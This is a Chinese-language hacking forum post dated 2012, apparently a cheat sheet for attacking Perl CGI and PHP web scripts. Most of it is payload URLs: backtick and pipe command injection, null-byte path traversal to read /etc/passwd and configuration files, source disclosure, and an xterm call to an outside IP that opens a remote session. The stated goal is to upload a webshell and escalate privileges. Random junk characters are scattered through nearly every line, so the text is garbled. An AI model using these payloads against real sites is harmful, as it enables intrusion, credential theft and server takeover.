总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着
! S' X, ?) u7 f- B# s! Mcookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
' V) y1 `' Y" t% k. S+ S感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们 + G, N0 P% |8 j. Y" V$ J- c
注“
- F) D. J* O5 n3 ]perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 * Z* x2 [6 N5 o' A7 f6 _9 \# a
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
4 m3 {' E5 z3 N( R- r/ j2 X: e2 f1 b2 W, f
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造 ; L3 U. i( z0 U J9 L
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
4 z. B- x1 M, Z" c' M+ d; O/ K3 Vhttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号 ' z4 E' B' H# s1 P2 v. u5 g
http://target.com/cgi-bin/home/news/sub.pl?`id`
: r* a, G/ n6 p: R; C+ o$ Ohttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`
9 `6 P: l! W7 m2 R, i! mhttp://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示
9 S* l3 z* |1 ^! t) j5 I" [ \! b7 n4 {& ?
http://target.com/test.pl;ls| 1 Y8 j, z+ _* v+ ?. n S3 v5 ~) g' I( T
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
8 \ e% E' V" J! Z* Xhttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26| . J O" O9 N' c8 s+ A
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造 , p7 W& F- J! y9 R
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。 ; u5 }* d0 _6 l1 R
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection % F* y/ u( [6 W: Q. h
: _8 q8 K9 C2 h0 r6 Ghttp://target.com/test.pl?&........ /../../etc/passwd 8 F% ^( B6 q3 }% f9 C
4 y+ I! T# Q7 r3 Nhttp://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./
- U) U3 h7 B2 Y: l* G6 L$ I3 ~http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了
- X2 x7 y4 s4 ]7 V% h& Shttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00
5 r" _4 I0 B8 o
2 R9 {/ d" L& v6 a0 chttp://www.target.org/show.php?f ... /include/config.php 查看php代码 % Z9 C% V- U7 L6 @+ t
http://www.target.org/show.php?f ... ng/admin/global.php 1 m( I/ s% K" D5 ~
. o! S0 R# [. L* x( e# K; d x# g- }
emm和ps的一句话
; V* M ]* A! e, k; f) ?
& z7 R0 o& t1 G4 Dhttp://www.target.org/cgi-bin/cl ... /../../../bin/ls%20
/ r4 t O5 ]3 S# ^& Z# K+ Q/ r
& @% h5 H9 Z( I1 @" s# F>bbb%20|
7 P% I; Y+ s8 {
9 H% |- h5 ?7 G( c* M, I* _6 Nhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串 9 M$ x0 d* K- d
1 {: {2 h9 r7 H4 x) }0 T J3 Phttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征 1 a( t9 d9 L: W( ?0 M! w
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin ) D( N; s. {/ x/ S' \. y
7 P1 F$ [' K, N- Y# h相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法 g$ p2 j8 |# G+ g7 z, V( w1 o
http://target.com/index.html#cmd.exe ! f3 x& y, W# ^4 p, e
http://target.com/index.html?dummyparam=xp_cmdshell % a2 B, A' ?0 f7 @+ A- N0 r R
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd + C9 I A8 K Z( M/ S2 h, N
|
发表于 2012-9-13 16:56:16
收藏
支持
反对